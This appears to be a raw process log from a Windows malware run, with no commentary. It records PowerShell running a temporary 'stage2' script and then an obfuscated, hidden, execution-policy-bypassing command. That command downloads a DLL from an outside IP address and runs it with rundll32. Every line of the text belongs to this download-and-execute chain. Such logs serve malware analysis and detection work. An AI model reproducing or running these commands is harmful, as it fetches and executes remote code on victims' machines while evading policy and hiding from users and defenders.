powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\stage2.ps1
2548powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -ep bypass "&('{1}{0}' -f 'R','IW') ('{1}{4}{3}{2}{0}' -f '/safer.dll','h','.143.37','111.90','ttp://') -outf C:\Users\test22\AppData\runner.dll;rundll32 C:\Users\test22\AppData\runner.dll,1"
2668rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\runner.dll 1
2776